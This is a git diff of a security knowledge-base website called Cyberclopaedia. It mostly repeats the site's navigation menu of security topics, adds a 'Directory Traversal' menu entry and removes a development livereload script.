        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -187,22 +187,6 @@

List Open Por - - diff --git a/docs/Post Exploitation/Enumeration/Linux/System Enumeration.html b/docs/Post Exploitation/Enumeration/Linux/System Enumeration.html index 9eaa7560..8f1b78dc 100644 --- a/docs/Post Exploitation/Enumeration/Linux/System Enumeration.html +++ b/docs/Post Exploitation/Enumeration/Linux/System Enumeration.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -210,22 +210,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Post Exploitation/Enumeration/Linux/User Enumeration.html b/docs/Post Exploitation/Enumeration/Linux/User Enumeration.html index a28a9e67..734de9c1 100644 --- a/docs/Post Exploitation/Enumeration/Linux/User Enumeration.html +++ b/docs/Post Exploitation/Enumeration/Linux/User Enumeration.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
